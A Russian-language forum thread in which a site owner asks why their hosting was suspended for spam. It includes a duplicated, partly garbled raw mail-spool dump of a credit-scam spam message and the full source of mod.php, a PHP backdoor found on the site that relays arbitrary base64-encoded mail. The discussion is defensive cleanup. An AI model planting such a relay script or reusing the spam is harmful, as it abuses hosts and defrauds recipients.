Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Ваша хостинговая площадка была заблокирована за SPAM помогите пожалуйста


icecream

Recommended Posts

Доброго времени суток, уважаемые коллеги!

 

Сегодня получил от хостера письмо с причиной блокировки моей площадки, помогите пожалуйста добрыми советами, что делать, где копать ?

 

Если я не ошибаюсь, то спам рассылку ведёт почтовый сервер, а не сам скрипт с внедрёный в движок ?

 

 

Ваша хостинговая площадка #109642 - была заблокирована в соответствии с Приложением 1 к ПУБЛИЧНОМУ ДОГОВОРУ, пункт 2.11.1 раздела ”Общие правила предоставления услуг” подраздела ”Права и обязанности Заказчика”.

Причина - несанкционированная рассылка.

Пример рассылаемых сообщений:

1Waf1t-0007iR-17-H
cp2516** 1169 32008
<cp2516**@cpane**.logol.ru>
1397713113 0
-ident cp2516**
-received_protocol local
-body_linecount 116
-max_received_linelength 81
-auth_id cp2516**
-auth_sender cp2516**@cpane**.logol.ru
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX
1
[email protected]

190P Received: from cp2516** by cpane**.logol.ru with local (Exim 4.80)
(envelope-from <cp2516**@cpane**.logol.ru>)
id 1Waf1t-0007iR-17
for [email protected]; Thu, 17 Apr 2014 09:38:33 +0400
025T To: <[email protected]>
057 Subject: =?windows-1251?B?UmU6IO/uIO/u4u7k8yDq8OXk6PLg?=
079 X-PHP-Script: goods-price.ru/engine/mailout.php for 95.26.230.62, 95.26.230.62
043 X-PHP-Originating-Script: 1169:mailout.php
082I Message-ID: <D2C69F5444874A1384AEFDDEBD9D7B98@128-72-132-53.broadband.corbina.ru>
074R Reply-To: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <[email protected]>
065F From: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <[email protected]>
038 Date: Thu, 17 Apr 2014 09:38:29 +0400
018 MIME-Version: 1.0
091 Content-Type: multipart/alternative;
boundary="----=_NextPart_000_08D5_01CF5A20.CA012640"
014 X-Priority: 3
026 X-MSMail-Priority: Normal
052 X-Mailer: Microsoft Windows Live Mail 14.0.8089.726
056 X-MimeOLE: Produced By Microsoft MimeOLE V14.0.8089.726
1Waf1t-0007iR-17-D
This is a multi-part message in MIME format.

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/plain;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9

=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=E0=F8 =EA=F0=E5=E4=E8=
=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=F0=E8 =EF=EE=EC=EE=F9=
=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=F1.
=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=E0=F2=E8=F2=FC =E1=
=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =FD=F2=EE =E4=E5=EB=E0=FE=
=F2 =E7=E0 =C2=E0=F1!

=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF =C2=E0=F1, =E5=F1=
=EB=E8:
=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =E7=E0 =EA=
=F0=E5=E4=E8=F2
=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 =E5=E6=E5=EC=E5=F1=
=FF=F7=ED=EE=E9 =EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.
=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=E0=F2=F3 =EF=EB=E0=
=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3
=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =EA=F0=
=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3
=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5, =E0 =E7=E0=F7=E0=F1=
=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5 =EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5
=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=FE =EA=F0=E5=E4=E8=F2=
=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8 =E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=
=EC
=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 "=ED=E0=E5=
=E7=E4=EE=E2" =EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=
=E2
=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=E0=F2=E8=F2=FC =E7=E0=
=EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5 =EF=EB=E0=F2=E5=E6=E8
=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 107 =F2=FB=F1=FF=F7 =E4=EE=
=EB=E3=EE=E2 =E7=E0 2 =E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2=
.
=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=EB =E1=EE=EB=E5=E5=
23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.

=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=E9=F7=E0=F1 =E8 =
=E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=EE=E2 - http://i=
s.gd/9LOjbF

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Dwindows-1251" http-equiv=3DContent-=
Type>
<META name=3DGENERATOR content=3D"MSHTML 9.00.8112.16437">
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft>=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dcenter>=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=
=E0=F8 =EA=F0=E5=E4=E8=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=
=F0=E8=20
=EF=EE=EC=EE=F9=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=
=F1.</DIV>
<DIV align=3Dcenter>=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=
=E0=F2=E8=F2=FC =E1=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =
=FD=F2=EE=20
=E4=E5=EB=E0=FE=F2 =E7=E0 =C2=E0=F1!</DIV>
<DIV align=3Dcenter> </DIV>
<DIV align=3Dleft>=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF=
=C2=E0=F1, =E5=F1=EB=E8:</DIV>
<UL>
<LI>
<DIV align=3Dleft>=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=
=E5=F2=E5 =E7=E0 =EA=F0=E5=E4=E8=F2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=
=F2 =E5=E6=E5=EC=E5=F1=FF=F7=ED=EE=E9=20
=EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.</DIV>
<LI>
<DIV align=3Dleft>=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=
=E0=F2=F3 =EF=EB=E0=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=
=E8=E2=E0=E5=F2=E5 =EA=F0=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3</DIV>
<LI>
<DIV align=3Dleft>=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5=
, =E0 =E7=E0=F7=E0=F1=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5=20
=EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =F3=EB=F3=F71Waf1t-0007iR-17-H
cp2516** 1169 32008
<cp251618@cpanel**.logol.ru>
1397713113 0
-ident cp2516**
-received_protocol local
-body_linecount 116
-max_received_linelength 81
-auth_id cp2516**
-auth_sender cp2516**@cpanel**.logol.ru
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX
1
[email protected]

190P Received: from cp2516** by cpanel9.logol.ru with local (Exim 4.80)
(envelope-from <cp2516**@cpanel**.logol.ru>)
id 1Waf1t-0007iR-17
for [email protected]; Thu, 17 Apr 2014 09:38:33 +0400
025T To: <[email protected]>
057 Subject: =?windows-1251?B?UmU6IO/uIO/u4u7k8yDq8OXk6PLg?=
079 X-PHP-Script: goods-price.ru/engine/mailout.php for 95.26.230.62, 95.26.230.62
043 X-PHP-Originating-Script: 1169:mailout.php
082I Message-ID: <D2C69F5444874A1384AEFDDEBD9D7B98@128-72-132-53.broadband.corbina.ru>
074R Reply-To: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <[email protected]>
065F From: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <[email protected]>
038 Date: Thu, 17 Apr 2014 09:38:29 +0400
018 MIME-Version: 1.0
091 Content-Type: multipart/alternative;
boundary="----=_NextPart_000_08D5_01CF5A20.CA012640"
014 X-Priority: 3
026 X-MSMail-Priority: Normal
052 X-Mailer: Microsoft Windows Live Mail 14.0.8089.726
056 X-MimeOLE: Produced By Microsoft MimeOLE V14.0.8089.726
1Waf1t-0007iR-17-D
This is a multi-part message in MIME format.

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/plain;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9

=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=E0=F8 =EA=F0=E5=E4=E8=
=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=F0=E8 =EF=EE=EC=EE=F9=
=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=F1.
=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=E0=F2=E8=F2=FC =E1=
=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =FD=F2=EE =E4=E5=EB=E0=FE=
=F2 =E7=E0 =C2=E0=F1!

=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF =C2=E0=F1, =E5=F1=
=EB=E8:
=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =E7=E0 =EA=
=F0=E5=E4=E8=F2
=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 =E5=E6=E5=EC=E5=F1=
=FF=F7=ED=EE=E9 =EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.
=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=E0=F2=F3 =EF=EB=E0=
=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3
=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =EA=F0=
=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3
=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5, =E0 =E7=E0=F7=E0=F1=
=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5 =EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5
=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=FE =EA=F0=E5=E4=E8=F2=
=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8 =E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=
=EC
=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 "=ED=E0=E5=
=E7=E4=EE=E2" =EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=
=E2
=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=E0=F2=E8=F2=FC =E7=E0=
=EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5 =EF=EB=E0=F2=E5=E6=E8
=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 107 =F2=FB=F1=FF=F7 =E4=EE=
=EB=E3=EE=E2 =E7=E0 2 =E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2=
.
=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=EB =E1=EE=EB=E5=E5=
23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.

=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=E9=F7=E0=F1 =E8 =
=E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=EE=E2 - http://i=
s.gd/9LOjbF

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Dwindows-1251" http-equiv=3DContent-=
Type>
<META name=3DGENERATOR content=3D"MSHTML 9.00.8112.16437">
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft>=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dcenter>=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=
=E0=F8 =EA=F0=E5=E4=E8=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=
=F0=E8=20
=EF=EE=EC=EE=F9=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=
=F1.</DIV>
<DIV align=3Dcenter>=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=
=E0=F2=E8=F2=FC =E1=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =
=FD=F2=EE=20
=E4=E5=EB=E0=FE=F2 =E7=E0 =C2=E0=F1!</DIV>
<DIV align=3Dcenter> </DIV>
<DIV align=3Dleft>=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF=
=C2=E0=F1, =E5=F1=EB=E8:</DIV>
<UL>
<LI>
<DIV align=3Dleft>=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=
=E5=F2=E5 =E7=E0 =EA=F0=E5=E4=E8=F2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=
=F2 =E5=E6=E5=EC=E5=F1=FF=F7=ED=EE=E9=20
=EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.</DIV>
<LI>
<DIV align=3Dleft>=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=
=E0=F2=F3 =EF=EB=E0=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=
=E8=E2=E0=E5=F2=E5 =EA=F0=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3</DIV>
<LI>
<DIV align=3Dleft>=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5=
, =E0 =E7=E0=F7=E0=F1=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5=20
=EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=
=FE =EA=F0=E5=E4=E8=F2=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8=20
=E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=EC</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=
=F1=FF =EE=F2 "=ED=E0=E5=E7=E4=EE=E2"=20
=EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=E2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=
=E0=F2=E8=F2=FC =E7=E0 =EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5=20
=EF=EB=E0=F2=E5=E6=E8</DIV></LI></UL>
<DIV align=3Dleft>=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 10=
7 =F2=FB=F1=FF=F7 =E4=EE=EB=E3=EE=E2 =E7=E0 2=20
=E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2.</DIV>
<DIV align=3Dleft>=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=
=EB =E1=EE=EB=E5=E5 23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dleft>=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=
=E9=F7=E0=F1 =E8 =E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=
=EE=E2 -=20
http://is.gd/9LOjbF</DIV></BODY></HTML>

------=_NextPart_000_08D5_01CF5A20.CA012640--


---------------------------------------------------------------
body hash: f93977fe0ad3f2e9b20733c9585a4c74=F8=E8=F2=FC =F1=E2=EE=
=FE =EA=F0=E5=E4=E8=F2=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8=20
=E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=EC</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=
=F1=FF =EE=F2 "=ED=E0=E5=E7=E4=EE=E2"=20
=EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=E2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=
=E0=F2=E8=F2=FC =E7=E0 =EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5=20
=EF=EB=E0=F2=E5=E6=E8</DIV></LI></UL>
<DIV align=3Dleft>=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 10=
7 =F2=FB=F1=FF=F7 =E4=EE=EB=E3=EE=E2 =E7=E0 2=20
=E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2.</DIV>
<DIV align=3Dleft>=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=
=EB =E1=EE=EB=E5=E5 23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dleft>=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=
=E9=F7=E0=F1 =E8 =E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=
=EE=E2 -=20
http://is.gd/9LOjbF</DIV></BODY></HTML>

------=_NextPart_000_08D5_01CF5A20.CA012640--


---------------------------------------------------------------
body hash: f93977fe0ad3f2e9b20733c9585a4c74

Надіслати
Поділитися на інших сайтах


Ищите на сайте вирус , например это что goods-price.ru/engine/mailout.php. Смотрите как он туда мог попасть. Если есть возможность, восстановите сайт без вируса, а потом пишите хостеру о проделанной работе и просьбой разблокировать сайт.

Надіслати
Поділитися на інших сайтах

Ищите на сайте вирус , например это что goods-price.ru/engine/mailout.php. Смотрите как он туда мог попасть. Если есть возможность, восстановите сайт без вируса, а потом пишите хостеру о проделанной работе и просьбой разблокировать сайт.

 

Спасибо Вам большое за подсказку, видел там этот файл, снёс к чёрту этот сайт, всёё равно до него руки не доходят из-за нехатки времени.

 

Скажите пожалуйста, а как вы узнали, что это именно этот домен/сайт ? :)

Я просто в этом письме от хостера вообще ничего не понял )

Надіслати
Поділитися на інших сайтах


В корне сайта обнаружил файл mod.php

 

Его содержимое:

 

<?php
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
    {
    echo "indata_error";
    exit;
    }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
    echo "sent_ok";
else
    echo "sent_error";
?>

 

Я в php не силён, но кажется тут что то зашифровано .

 

В папке system обнаружил файл wp-mailer.php .

 

Подскажите пожалуйста, какие необходимо провести действия для полного устранения этого скрипта и избежать подобной ситуации?

Достаточно ли будет удалить эти два файла ?

Могли ли внедрить вредоносный код в системные файлы ?

 

Не знаю, что делать и в php не силён, помогите пожалуйста HALP , можно за денежку

Надіслати
Поділитися на інших сайтах


Искать дыры и вирусы за денежку, дело неблагодарное, если только за деньжища )) т.к возможен и рецидив... и все сначала..

 

да ничего не защифровано там, просто спамят с помощью вашего ресурса. Возможно попало через WP или Joomla или еще какие дыры. 

А какие действия... интернет полон рекомендациями что и как делать.

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.